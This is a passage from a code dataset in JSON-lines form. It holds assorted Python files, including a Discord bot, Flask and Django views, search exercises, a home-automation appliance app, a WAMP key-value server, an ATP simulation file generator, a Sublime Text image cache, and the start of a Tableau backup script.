dct)\n\n\nclass WorkerCreator(metaclass=WorkerMeta):\n def run(self):\n while self.keep_going:\n self.logic()\n","sub_path":"framework/workers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"372337807","text":"# Derived from a modification of a test script by Rapptz, by TAOTheCrab, by me.\n# (You get all that?)\n\nimport discord\nimport logging\nimport os.path\nimport random\nimport tasks\nimport yaml\n\nclient = discord.Client()\n\nlogging.basicConfig(level=logging.INFO)\n\n# For interactions in the mudquest text channel\ntry:\n import mudquest\n mq = mudquest.Game()\n mq_online = True\nexcept ImportError:\n mq_online = False\n\n# For !mudbot\ntry:\n from cleverbot import Cleverbot\n cb = Cleverbot()\n cb_online = True\nexcept ImportError:\n cb = None\n cb_online = False\n\n# Create quotes.json if it doesn't exist.\nif not os.path.isfile(\"quotes.json\"):\n file = open(\"quotes.json\", \"w+\")\n file.write(\"{}\")\n file.close()\n\n\n@client.event\nasync def on_ready():\n print(\"Logged in as\")\n print(client.user.name)\n print(client.user.id)\n print(\"------\")\n\n\n@client.event\nasync def on_message(message):\n # We do not want the bot to reply to itself\n if message.author == client.user:\n return\n\n info = (client, message)\n\n await tasks.general.run(*info) # update, echo/anonecho, whoami, whereami\n await tasks.chance.run(*info) # 8ball, roll, flip, burn/burn anon\n await tasks.quotes.run(*info) # quotes\n await tasks.chatbot.run(*info, cb_online, cb) # !mudbot (chat with Cleverbot)\n await tasks.mudquest.run(*info, mq_online) # Play Mudquest\n\n\nwith open(\"config.yml\") as file:\n config = yaml.safe_load(file)\n\ntoken = config[\"token\"]\n\nclient.run(token)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"380339770","text":"from flask import (Blueprint,\n render_template,\n url_for,\n redirect\n )\nfrom flask_login import current_user, login_required\n\n\nfrom pygments.lexers import get_lexer_for_filename, get_lexer_by_name\nfrom pygments import highlight\nfrom pygments.formatters import HtmlFormatter\n\nimport difflib\n\nfrom sacca.web import acl, forms\nfrom sacca import models\n\nmodule = Blueprint('teaching_assistants.solutions',\n __name__,\n url_prefix='/solutions',\n )\n\n@module.route('/')\n@acl.allows.requires(acl.is_teaching_assistant)\ndef index():\n return render_template('/administration/solutions/view.html')\n\n\n\n@module.route('/')\n@acl.allows.requires(acl.is_teaching_assistant)\ndef view(solution_id):\n solution = models.Solution.objects.get(id=solution_id)\n code = solution.code.read().decode()\n\n lexer = get_lexer_for_filename(solution.code.filename)\n\n formatter = HtmlFormatter(linenos=True)\n formated_code = highlight(code, lexer, formatter)\n style = formatter.get_style_defs('.highlight')\n\n console_lexer = get_lexer_by_name(\"console\")\n return render_template('/administration/solutions/view.html',\n solution=solution,\n formated_code=formated_code,\n console_lexer=console_lexer,\n formatter=formatter,\n highlight=highlight,\n difflib=difflib,\n style=style)\n\n\n\n@module.route('//code')\n@acl.allows.requires(acl.is_teaching_assistant)\ndef download_code(solution_id):\n solution = models.Solutuib.objects.get(id=solution_id)\n return render_template('/administration/solutions/code.html',\n solution)\n\n\n\n","sub_path":"sacca/web/views/teaching_assistants/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"159538747","text":"from django.shortcuts import render,redirect\nfrom products import models as products_models\nfrom . import models, forms\nfrom django.http import JsonResponse, HttpResponse\nimport json\nfrom django.forms.models import model_to_dict\n# Create your views here.\ndef index_sl(req):\n\t# sales = models.Sale.objects.filter(owner=req.user)\n\tform = forms.SalesForm()\n\tsaledetail=models.SaleDetail.objects.all()\n\tif req.POST:\n\t\tform = forms.SalesForm(req.POST)\n\t\tif form.is_valid():\n\t\t\tform.instance.owner = req.user\n\t\t\tsale = form.save()\n\t\t\treturn redirect('/sales/{}'.format(sale.id))\n\treturn render(req, ('sales/index.html'), {\n\t\t# 'data1' : sales,\n\t\t'form' : form,\n\t\t'detail' : saledetail,\n\t\t})\n\ndef index(req):\n\tsale = models.Sale.objects.all()\n\n\tsaledetailbyid = [] # merubah array versi django mjd array biasa\n\tfor p in sale:\n\t\tsaledetailbyid.append(model_to_dict(p))\n\treturn JsonResponse({'data': saledetailbyid})\n\ndef show_detail(req, id):\n\tif req.method == 'GET':\t\n\t\tshowdetail = models.Sale.objects.filter(pk=id).first()\n\t\tdetailbyid = showdetail.sesuai.all()\n\n\t\tshowbysale = []\n\t\tfor s in detailbyid:\n\t\t\tshowbysale.append(model_to_dict(s))\n\t\treturn JsonResponse({\n\t\t\t'show' : showbysale\n\t\t\t# 'show' : model_to_dict(showbysale.instance)\n\t\t})\n\ndef sale_detail(req):\n\t# tasks = models.Sale.objects.filter(owner=req.user)\n\tform = forms.SaleDetail()\n\tif req.method == 'POST':\n\t\tdata_byte = req.body\n\t\tdata_string = str(data_byte, 'utf-8')\n\t\tdata = json.loads(data_string)\n\n\t\tsale = models.Sale.objects.create()\n\t\tfor order in data['orders']:\n\t\t\tdetailbyprod = products_models.Prod.objects.filter(pk=order['products']).first()\n\t\t\tform = forms.SaleDetail(order)\n\n\t\t\tif form.is_valid():\n\t\t\t\tform.instance.sale = sale\n\t\t\t\tform.instance.products = detailbyprod\n\t\t\t\tsd=form.save()\n\t\t\t\tstok_baru = sd.products.stok-order['qty']\n\t\t\t\tproducts_models.Prod.objects.filter(pk=sd.products.id).update(stok=stok_baru)\n\t\tsaledetail=models.SaleDetail.objects.filter(sale=sale)\n\t\ttotal=0\n\t\tfor t in saledetail:\n\t\t\ttotal+=t.total()\n\t\treturn JsonResponse({\n\t\t\t'total':total,\n\t\t\t'sale':model_to_dict(sale),\n\t\t})\n\n\treturn JsonResponse({\n\t\t\t'error': 'harus post',\n\t\t})\n\ndef transaksi(req):\n\t# tasks = models.Sale.objects.filter(owner=req.user)\n\tsale = models.Sale.objects.all()\n\ttotal =0\n\tfor p in sale:\n\t\ttotal+=p.total()\n\n\treturn render(req, ('transaksi/list_transaksi.html'), {\n\t\t'data' : sale,\n\t\t'total': total,\n\t\t# 'data' : tasks,\n\t\t})\n\ndef input(req):\n\t# tasks = models.Sale.objects.filter(owner=req.user)\n\tform = forms.SalesForm()\n\n\tif req.POST:\n\t\tform = forms.SalesForm(req.POST)\n\t\tif form.is_valid():\n\t\t\tform.instance.owner = req.user\n\t\t\tform.save()\n\t\t\n\t\treturn redirect('/sales')\n\n\tsale = models.Sale.objects.all()\n\treturn render(req, ('sales/input.html'), {\n\t\t'data' : sale,\n\t\t'form' : form,\n\t\t'data' : tasks,\n\t\t})\n\ndef cetak(req):\n\tprint = models.Sale.objects.all()\n\treturn render(req, ('sales/print.html'), {\n\t\t'data' : print,\n\t\t})\n\t\ndef delete(req, id):\n\tmodels.Sale.objects.filter(pk=id).delete()\n\treturn redirect('/sales')\n\ndef detail(req, id):\n\tsale = models.Sale.objects.filter(pk=id).first()\n\tsaledetail=models.SaleDetail.objects.filter(sale=sale)\n\treturn render(req, 'sales/detail.html', {\n\t\t'data': sale,\n\t\t'datadetail': saledetail,\n\t\t})\n\ndef delete_detail(req,id,id_detail):\n\tmodels.SaleDetail.objects.filter(pk=id_detail).delete()\n\t# stok_detail = products.stok+qty\n\t# products_models.Prod.objects.filter(pk=sale.products.id).update(stok=stok_detail)\n\treturn redirect(f'/sales/{id}/detail')\n\n","sub_path":"sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"414130626","text":"''''''\n'''Linear Search'''\n''''''\ndef linear_search(list, target):\n for i, item in enumerate(list):\n if target==item:\n return i\n return None\n\ndef linear_search(list, target):\n for i in range(0, len(list)):\n if list[i]==target:\n return i\n return None\n\n\n\n\ndef verify(index):\n if index is not None:\n print(f\"Target Found at index: {index}\")\n else:\n print(\"Target not found in list\")\n\n\nnumbers = [n for n in range(-11,11)]\n\n'''check if everything works as expected'''\n'''if each one of them produces unexpected result, then the algorithm is not working'''\n\n# r = linear_search(numbers, 6)\n# verify(r)\n#\n# r = linear_search(numbers, 12)\n# verify(r)\n\n\n\n\n\n\n\n\n''''''\n'''Binary Search'''\n''''''\n\n'''run on constant space'''\n\ndef Binary_seach(list, target):\n first = 0\n last = len(list)-1\n while first <= last:\n midpoint = (first+last)//2\n if list[midpoint]==target:\n return midpoint\n elif list[midpoint] None:\n \"\"\"Initialize.\"\"\"\n super().initialize()\n\n self.listen_ios_event(\n self.response_from_push_notification,\n self.properties['ios_emptied_key'])\n self.listen_state(\n self.power_changed,\n self.app.entities['power'],\n constrain_input_boolean=self.enabled_entity_id)\n self.listen_state(\n self.status_changed,\n self.app.entities['status'],\n constrain_input_boolean=self.enabled_entity_id)\n\n def power_changed( # pylint: disable=too-many-arguments\n self, entity: Union[str, dict], attribute: str, old: str, new: str,\n kwargs: dict) -> None:\n \"\"\"Deal with changes to the power draw.\"\"\"\n power = float(new)\n if (self.app.state != self.app.States.running\n and power >= self.properties['running_threshold']):\n self.log('Setting dishwasher to \"Running\"')\n\n self.app.state = (self.app.States.running)\n elif (self.app.state == self.app.States.running\n and power <= self.properties['drying_threshold']):\n self.log('Setting dishwasher to \"Drying\"')\n\n self.app.state = (self.app.States.drying)\n elif (self.app.state == self.app.States.drying\n and power == self.properties['clean_threshold']):\n self.log('Setting dishwasher to \"Clean\"')\n\n self.app.state = (self.app.States.clean)\n\n def status_changed( # pylint: disable=too-many-arguments\n self, entity: Union[str, dict], attribute: str, old: str, new: str,\n kwargs: dict) -> None:\n \"\"\"Deal with changes to the status.\"\"\"\n if new == self.app.States.clean.value:\n self.handles[HANDLE_CLEAN] = self.notification_manager.repeat(\n 'Dishwasher Clean 🍽',\n \"Empty it now and you won't have to do it later!\",\n self.properties['notification_interval'],\n when=self.datetime() + timedelta(minutes=15),\n target='home',\n data={'push': {\n 'category': 'dishwasher'\n }})\n elif old == self.app.States.clean.value:\n if HANDLE_CLEAN in self.handles:\n self.handles.pop(HANDLE_CLEAN)()\n\n def response_from_push_notification(\n self, event_name: str, data: dict, kwargs: dict) -> None:\n \"\"\"Respond to iOS notification to empty the appliance.\"\"\"\n self.log('Responding to iOS request that dishwasher is empty')\n\n self.app.state = self.app.States.dirty\n\n target = self.notification_manager.get_target_from_push_id(\n data['sourceDevicePermanentID'])\n self.notification_manager.send(\n 'Dishwasher Emptied',\n '{0} emptied the dishwasher.'.format(target),\n target='not {0}'.format(target))\n\n\nclass WasherDryer(Base):\n \"\"\"Define an app to represent a washer/dryer-type appliance.\"\"\"\n\n class States(Enum):\n \"\"\"Define an enum for states.\"\"\"\n\n clean = 'Clean'\n dirty = 'Dirty'\n drying = 'Drying'\n running = 'Running'\n\n @property\n def state(self) -> Enum:\n \"\"\"Get the state.\"\"\"\n return self.States(self.get_state(self.entities['status']))\n\n @state.setter\n def state(self, value: Enum) -> None:\n \"\"\"Set the state.\"\"\"\n self.select_option(self.entities['status'], value.value)\n","sub_path":"appdaemon/settings/apps/washer_dryer.py","file_name":"washer_dryer.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"497755179","text":"###############################################################################\r\n##\r\n## Copyright 2011 Tavendo GmbH\r\n##\r\n## Licensed under the Apache License, Version 2.0 (the \"License\");\r\n## you may not use this file except in compliance with the License.\r\n## You may obtain a copy of the License at\r\n##\r\n## http://www.apache.org/licenses/LICENSE-2.0\r\n##\r\n## Unless required by applicable law or agreed to in writing, software\r\n## distributed under the License is distributed on an \"AS IS\" BASIS,\r\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n## See the License for the specific language governing permissions and\r\n## limitations under the License.\r\n##\r\n###############################################################################\r\n\r\nimport sys, shelve\r\nfrom twisted.python import log\r\nfrom twisted.internet import reactor\r\nfrom autobahn.websocket import listenWS\r\nfrom autobahn.wamp import exportRpc, WampServerFactory, WampServerProtocol\r\n\r\n\r\nclass KeyValue:\r\n \"\"\"\r\n Simple, persistent key-value store.\r\n \"\"\"\r\n\r\n def __init__(self, filename):\r\n self.store = shelve.open(filename)\r\n\r\n @exportRpc\r\n def set(self, key = None, value = None):\r\n if key is not None:\r\n k = str(key)\r\n if value is not None:\r\n self.store[k] = value\r\n else:\r\n if self.store.has_key(k):\r\n del self.store[k]\r\n else:\r\n self.store.clear()\r\n\r\n @exportRpc\r\n def get(self, key = None):\r\n if key is None:\r\n return self.store.items()\r\n else:\r\n return self.store.get(str(key), None)\r\n\r\n @exportRpc\r\n def keys(self):\r\n return self.store.keys()\r\n\r\n\r\nclass KeyValueServerProtocol(WampServerProtocol):\r\n \"\"\"\r\n Demonstrates creating a server with Autobahn WebSockets that provides\r\n a persistent key-value store which can we access via RPCs.\r\n \"\"\"\r\n\r\n def onSessionOpen(self):\r\n ## register the key-value store, which resides on the factory within\r\n ## this connection\r\n self.registerForRpc(self.factory.keyvalue, \"http://example.com/simple/keyvalue#\")\r\n\r\n\r\nclass KeyValueServerFactory(WampServerFactory):\r\n\r\n protocol = KeyValueServerProtocol\r\n\r\n def __init__(self, url):\r\n WampServerFactory.__init__(self, url)\r\n\r\n ## the key-value store resides on the factory object, since it is to\r\n ## be shared among all client connections\r\n self.keyvalue = KeyValue(\"keyvalue.dat\")\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n log.startLogging(sys.stdout)\r\n factory = KeyValueServerFactory(\"ws://localhost:9000\")\r\n listenWS(factory)\r\n reactor.run()\r\n","sub_path":"demo/rpc/keyvalue/keyvalue_server.py","file_name":"keyvalue_server.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"237649750","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/7/20\n# @Author : RoyYoung\n\n\"\"\"\n生成atp类\n\"\"\"\nimport os\nimport shutil\n\nfrom Config import Config\nfrom atp.LccLib import LccLib\nfrom atp.ParseHandler import ParseHandler\nfrom utils import ArgSet\nfrom utils.ArgToList import ArgvToList\nfrom utils.Convert import Convert\nfrom utils.Triple import Triple\n\n\nclass CreateAtp(object):\n def __init__(self, path, fileName, parseHandler, bpa, configPath):\n print(path, fileName, configPath)\n\n self.__path = path\n self.__fileName = fileName\n self.__handler = parseHandler\n self.bpa = bpa\n Config.set_config_path(configPath)\n\n self.__switch_list = []\n\n # 先把上一次残留的temp文件删除\n if os.path.isdir(self.__path + '/temp'):\n shutil.rmtree(self.__path + '/temp')\n\n def create(self, atp, argDic: dict):\n \"\"\"\n 生成atp文件的方法\n :param atp: atp的文件路径\n :param argDic: 所有参数设置的字典 {“switch”:swtich_arg_set}\n :return:\n \"\"\"\n print('create arg dic:')\n total = Config.get_total_times()\n\n for k in argDic:\n print(k)\n print(argDic[k].argList)\n\n # 创建父级目录\n dir = self.__path + '/temp'\n if not os.path.exists(dir):\n os.mkdir(dir)\n\n for time in range(int(total)):\n # 初始化本地的组件列表\n # branch = self.__handler.branch.values()\n branch = self.create_branch(argDic[\"branch\"], total, time + 1)\n lcc = self.create_lcc(argDic['lcc'])\n\n switch = self.create_switch(argDic[\"switch\"], total, time + 1)\n # switch.extend(self.bpa.createSwitch(total, time + 1))\n for s in self.bpa.createSwitch(total, time + 1):\n if s.getNodes() in self.__handler.switch:\n switch.append(s)\n\n source = self.create_source(argDic['source'], total, time + 1)\n # source.extend(self.bpa.createSource(total, time + 1))\n for s in self.bpa.createSource(total, time + 1):\n if s.getNodes() in self.__handler.source:\n source.append(s)\n\n arrester = self.create_arrester(argDic['arrester'], total, time + 1)\n thunder = self.create_thunder(argDic['thunder'], total, time + 1)\n output = self.__handler.output\n\n # 新建目录和文件\n dir = self.__path + '/temp/' + self.__fileName + \"_%d\" % time\n if not os.path.exists(dir):\n os.mkdir(dir)\n shutil.copy(atp, dir)\n self.__file = open(dir + \"/\" + self.__fileName + '.atp', 'w+', encoding='cp1252')\n\n # 写入文件开头\n self.__infoWrite(self.__handler.info)\n\n # 写入文件\n self.__branchWrite(branch)\n self.__arresterWrite(arrester)\n self.__lccWrite(lcc)\n self.__switchWrite(switch)\n self.__sourceWrite(source)\n self.__thunderWrite(thunder)\n self.__outputWrite(output)\n\n # 写入文件结尾\n self.__file.writelines(\n [\"BLANK BRANCH\\n\",\n \"BLANK SWITCH\\n\",\n \"BLANK SOURCE\\n\",\n \"BLANK OUTPUT\\n\",\n \"BLANK PLOT\\n\",\n \"BEGIN NEW DATA CASE\\n\",\n \"BLANK\\n\"])\n self.__file.close()\n\n def create_switch(self, dicSwitch: ArgSet, total, time):\n \"\"\"\n 根据参数设置创建switch\n :param dicSwitch: argDic['switch']\n :param total: 3\n :param time: 1 2 3\n :return: 返回生成的switch\n \"\"\"\n print(\"create_switch\")\n print(dicSwitch.argList)\n\n switch = []\n # 开关参数设置\n argEntity = dicSwitch.getEntities()\n\n for k, v in list(self.__handler.switch.items()):\n # 对于三相直接跳过\n if k.endswith('*'):\n continue\n\n # 没有设置参数\n if k not in argEntity:\n switch.append(v.clone())\n continue\n\n # 针对一个元件多个结点参数设置情况\n # 如果该结点在参数设置中存在\n while k in argEntity:\n # 获取结点index,删除该结点,获取arglist\n index = argEntity.index(k)\n argList = ArgvToList.toList(dicSwitch.getArg(index), total, time)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # 获取参数设置后的结点\n argSwitch = []\n for i in range(len(argList)):\n # 第奇数个参数,闭合\n if i % 2 == 0:\n temp = v.clone()\n temp.tclose = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n argSwitch.append(temp)\n # 第偶数个参数,断开\n elif i % 2 == 1:\n argSwitch[i // 2].top = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n # temp.top = Convert.toDecimal(argList[i])\n\n # 参数个数多于两个,并且为奇数,即最后一个的top没有值\n if (len(argList) > 2) and (len(argList) // 2 == 1):\n argSwitch[-1].top = Config.get_time_max()\n\n switch.extend(argSwitch)\n\n return switch\n\n def create_branch(self, dicBranch, total, time):\n \"\"\"\n 根据参数设置创建branch\n :param dicBranch: argDic['branch']\n :param total:\n :param time:\n :return: 返回生成的branch\n \"\"\"\n print(\"create_branch\")\n print(dicBranch.argList)\n\n branch = []\n # 参数设置\n argEntity = dicBranch.getEntities()\n\n for k, v in list(self.__handler.branch.items()):\n # 对于三相总线路直接跳过\n if k.endswith('*'):\n continue\n\n # 没有设置参数\n if k not in argEntity:\n branch.append(v.clone())\n continue\n\n # 针对一个元件多个结点参数设置情况,只选取第一个,其余的忽略\n index = argEntity.index(k)\n arg = dicBranch.getArg(index)\n argList = ArgvToList.toList(dicBranch.getArg(index), total, time)\n while k in argEntity:\n index = argEntity.index(k)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # 获取参数设置后的生成结点\n # 对三相的每一个单结点判断\n e = v.clone()\n i = 0\n\n if not e.r == 0 and i < len(argList):\n e.r = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n i += 1\n\n if not e.l == 0 and i < len(argList):\n e.l = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n i += 1\n\n if not e.c == 0 and i < len(argList):\n e.c = Convert.offsetRandom(Convert.toDecimal(argList[i]))\n i += 1\n\n branch.append(e)\n\n return branch\n\n def create_lcc(self, dicLcc):\n \"\"\"\n 根据参数设置创建lcc\n :param dicLcc: argDic['lcc']\n :return: 返回生成的lcc\n \"\"\"\n print(\"create_lcc\")\n print(dicLcc.argList)\n\n lcc = []\n # 参数设置\n argEntity = dicLcc.getEntities()\n\n for k, v in list(self.__handler.lcc.items()):\n\n # 没有设置参数\n if k not in argEntity:\n lcc.append(v.clone())\n continue\n\n # 针对一个元件多个结点参数设置情况,只选取第一个,其余的忽略\n index = argEntity.index(k)\n while k in argEntity:\n index = argEntity.index(k)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # 获取参数设置后 生成结点\n lcc.extend(LccLib.modify(v, dicLcc.getArg(index)))\n\n return lcc\n\n def create_source(self, dicSource, total, time):\n \"\"\"\n 根据参数设置创建source\n :param dicSource: argDic['source']\n :param total:\n :param time:\n :return: 返回生成的source\n \"\"\"\n print(\"create_source\")\n print(dicSource.argList)\n\n source = []\n # 参数设置\n argEntity = dicSource.getEntities()\n\n for node, element in list(self.__handler.source.items()):\n # 对于三相总线路\n if node.endswith('*'):\n a, b, c = Triple.tripleToSingle(self.__handler.source, node)\n argList = ArgvToList.toList(dicSource.getArg(argEntity.index(node)), total,\n time) if node in argEntity else []\n if len(argList) > 0:\n a.ampl = b.ampl = c.ampl = Convert.toDecimal(argList[0])\n if len(argList) >= 2:\n a.phase = Convert.toDecimal(argList[1])\n b.phase = a.phase - 120\n c.phase = a.phase + 120\n source.append(a)\n source.append(b)\n source.append(c)\n continue\n\n # 有三相结点覆盖,则忽略\n if (node[:-1] + '*') in list(self.__handler.source.keys()):\n continue\n # 没有设置参数\n if node not in argEntity:\n source.append(element.clone())\n continue\n\n index = argEntity.index(node)\n\n # 针对一个元件多个结点参数设置情况,只选取第一个,其余的忽略\n argList = ArgvToList.toList(dicSource.getArg(index), total, time)\n while node in argEntity:\n index = argEntity.index(node)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # 获取参数设置后的生成结点\n e = element.clone()\n\n if len(argList) > 0:\n e.ampl = Convert.toDecimal(argList[0])\n if len(argList) >= 2:\n e.phase = Convert.toDecimal(argList[1])\n\n source.append(e)\n\n return source\n\n def create_arrester(self, dicArrester, total, time):\n \"\"\"\n 根据参数设置创建arrester\n :param dicSource: argDic['arrester']\n :param total:\n :param time:\n :return: 返回生成的arrester\n \"\"\"\n print(\"create_arrester\")\n print(dicArrester.argList)\n\n arrester = []\n # 参数设置\n argEntity = dicArrester.getEntities()\n\n for node, element in list(self.__handler.arrester.items()):\n # 避雷器一定是三相的\n if not node.endswith('*'):\n continue\n\n a, b, c = Triple.tripleToSingle(self.__handler.arrester, node)\n argList = ArgvToList.toList(dicArrester.getArg(argEntity.index(node)), total,\n time) if node in argEntity else []\n if len(argList) > 0:\n a.vref = Convert.toDecimal(argList[0])\n\n arrester.append(a)\n arrester.append(b)\n arrester.append(c)\n\n return arrester\n\n def create_thunder(self, dicThunder, total, time):\n\n \"\"\"\n 根据参数设置创建thunder\n :param dicThunder: argDic['thunder']\n :param total:\n :param time:\n :return: 返回生成的thunder\n \"\"\"\n print(\"create_thunder\")\n print(dicThunder.argList)\n\n thunder = []\n # 参数设置\n argEntity = dicThunder.getEntities()\n\n for node, element in list(self.__handler.thunder.items()):\n # 没有设置参数\n if node not in argEntity:\n thunder.append(element.clone())\n continue\n\n index = argEntity.index(node)\n\n # 针对一个元件多个结点参数设置情况,只选取第一个,其余的忽略\n argList = ArgvToList.toList(dicThunder.getArg(index), total, time)\n while node in argEntity:\n index = argEntity.index(node)\n # argEntity.pop(index)\n argEntity[index] = ''\n\n # 获取参数设置后的生成结点\n e = element.clone()\n\n if len(argList) > 0:\n e.ampl = Convert.toDecimal(argList[0])\n if len(argList) > 1:\n e.freq = Convert.toDecimal(argList[1])\n if len(argList) > 2:\n e.phase = Convert.toDecimal(argList[2])\n\n thunder.append(e)\n\n return thunder\n\n def __argSet(self):\n \"\"\"\n 先根据设定的参数,来配置新的实例项\n :return:\n \"\"\"\n pass\n\n def __infoWrite(self, info):\n \"\"\"\n 写入开头注释部分\n :param info:\n :return:\n \"\"\"\n self.__file.write(info.generate())\n\n def __headWrite(self, head):\n \"\"\"\n 写��第一个信息\n :param head:\n :return:\n \"\"\"\n self.__file.write(head.generate())\n\n def __branchWrite(self, list):\n \"\"\"\n 写入branch信息\n :param list:\n :return:\n \"\"\"\n self.__file.writelines(['/BRANCH\\n',\n 'C < n1 >< n2 >< R >< L >< C >\\n',\n 'C < n1 >< n2 >< R >< A >< B ><><>0\\n'])\n for i in list:\n self.__file.write(i.generate())\n\n def __arresterWrite(self, list):\n \"\"\"\n 避雷器信息\n :param list:\n :return:\n \"\"\"\n for i in list:\n self.__file.write(i.generate())\n\n def __lccWrite(self, list):\n \"\"\"\n lcc信息\n :param list:\n :return:\n \"\"\"\n for i in list:\n self.__file.write(i.generate())\n\n def __switchWrite(self, list):\n \"\"\"\n switch信息\n :param list:\n :return:\n \"\"\"\n self.__file.writelines([\"/SWITCH\\n\", \"C < n 1>< n 2>< Tclose >< Ie >< type >\\n\"])\n for i in list:\n self.__file.write(i.generate())\n\n def __sourceWrite(self, list):\n \"\"\"\n source信息\n :param list:\n :return:\n \"\"\"\n self.__file.writelines(\n [\"/SOURCE\\n\", \"C < n 1><>< Ampl. >< Freq. >< A1 >< T1 >< TSTART >< TSTOP >\\n\"])\n for i in list:\n self.__file.write(i.generate())\n\n def __thunderWrite(self, list):\n \"\"\"\n thunder信息\n :param list:\n :return:\n \"\"\"\n for i in list:\n self.__file.write(i.generate())\n\n def __outputWrite(self, output):\n \"\"\"\n output信息\n :param list:\n :return:\n \"\"\"\n self.__file.write(\"/OUTPUT\\n\")\n self.__file.write(output.generate())\n\n\nif __name__ == \"__main__\":\n from utils.ArgSet import ArgSet, ArgSet, ArgSet\n\n parseHandler = ParseHandler()\n parseHandler.parse(r\"C:\\Users\\Administrator\\Desktop\\atp\\方式1-N-1-主变合环-涂天线-单相重合闸-0.7s.atp\")\n create = CreateAtp(r\"C:\\Users\\Administrator\\Desktop\\atp\", '方式1-N-1-主变合环-涂天线-单相重合闸-0.7s', parseHandler)\n create.create(1, {'switch': ArgSet(), 'branch': ArgSet()}, '')\n","sub_path":"atp/CreateAtp.py","file_name":"CreateAtp.py","file_ext":"py","file_size_in_byte":15582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"314810348","text":"# -*- encoding: utf-8 -*-\n\nimport os.path\nimport tempfile\nimport sublime\nfrom threading import Thread\nimport urllib.request, urllib.error\nfrom .functions import *\n\nCACHE_FILE = os.path.join(tempfile.gettempdir(),\n 'MarkdownLivePreviewCache.txt')\nTIMEOUT = 20 # seconds\n\nSEPARATOR = '---%cache%--'\n\ndef get_base64_saver(loading, url):\n def callback(content):\n if isinstance(content, urllib.error.HTTPError):\n if content.getcode() == 404:\n loading[url] = 404\n return\n elif isinstance(content, urllib.error.URLError):\n if (content.reason.errno == 11001 and\n content.reason.strerror == 'getaddrinfo failed'):\n loading[url] = 404\n return\n return sublime.error_message('An unexpected error has occured: ' +\n str(content))\n loading[url] = to_base64(content=content)\n\n return callback\n\ndef get_cache_for(imageurl):\n if not os.path.exists(CACHE_FILE):\n return\n with open(CACHE_FILE) as fp:\n for line in fp.read().splitlines():\n url, base64 = line.split(SEPARATOR, 1)\n if url == imageurl:\n return base64\n\ndef cache(imageurl, base64):\n with open(CACHE_FILE, 'a') as fp:\n fp.write(imageurl + SEPARATOR + base64 + '\\n')\n\nclass ImageLoader(Thread):\n\n def __init__(self, url, callback):\n Thread.__init__(self)\n self.url = url\n self.callback = callback\n\n def run(self):\n try:\n page = urllib.request.urlopen(self.url, None, TIMEOUT)\n except Exception as e:\n self.callback(e)\n else:\n self.callback(page.read())\n\n\nclass ImageManager(object):\n\n \"\"\"\n Usage:\n\n >>> image = ImageManager.get('http://domain.com/image.png')\n >>> image = ImageManager.get('http://domain.com/image.png')\n # still loading (this is a comment, no an outputed text), it doesn't\n # run an other request\n >>> image = ImageManager.get('http://domain.com/image.png')\n 'data:image/png;base64,....'\n \"\"\"\n loading = {}\n\n @staticmethod\n def get(imageurl, user_callback=None):\n\n cached = get_cache_for(imageurl)\n if cached:\n return cached\n elif imageurl in ImageManager.loading.keys():\n # return None (the file is still loading, already made a request)\n # return string the base64 of the url (which is going to be cached)\n temp_cached = ImageManager.loading[imageurl]\n if temp_cached == 404:\n return to_base64('404.png')\n if temp_cached:\n cache(imageurl, temp_cached)\n del ImageManager.loading[imageurl]\n return temp_cached\n else:\n # load from internet\n ImageManager.loading[imageurl] = None\n callback = get_base64_saver(ImageManager.loading, imageurl)\n loader = ImageLoader(imageurl, callback)\n loader.start()\n sublime.set_timeout_async(lambda: loader.join(), TIMEOUT * 1000)\n","sub_path":"image_manager.py","file_name":"image_manager.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"531562686","text":"import tableauserverclient as TSC\nimport json\nimport datetime\nimport os, errno\nimport logging\nimport shutil\nimport boto3\nfrom argparse import ArgumentParser\nimport sys\n\nproject_children = {}\nprojects = {}\nproject_paths = {}\n\ndef zipdir(path, ziph):\n # ziph is zipfile handle\n for root, dirs, files in os.walk(path):\n for file in files:\n ziph.write(os.path.join(root, file))\n\ndef folder_builder(root_id):\n\tfor project_id in project_children[root_id]:\n\t\tfolder_name = projects[project_id].name\n\t\tfolder_path = project_paths[root_id] + \"/\" + folder_name\n\t\tproject_paths[project_id] = folder_path\n\t\ttry:\n\t\t os.makedirs(folder_path)\n\t\texcept OSError as e:\n\t\t\tpass\n\t\tif project_id in project_children:\n\t\t\tfolder_builder(project_id)\n\ndef main():\n\tparser = ArgumentParser()\n\tparser.add_argument(\"-c\", \"--config\", dest=\"config_file_path\",\n\t help=\"path to config file to be used\", metavar=\"CONFIG\")\n\n\targs = parser.parse_args()\n\n\tif not args.config_file_path:\n\t\tprint('You must include a config file path')\n\t\tsys.exit(1) # abort because of error\n\t#Get configs\n\twith open(args.config_file_path) as json_file:\n\t\tjson_data = json.load(json_file)\n\n\tUSERNAME = json_data['username']\n\tPASSWORD = json_data['password']\n\tSITE = 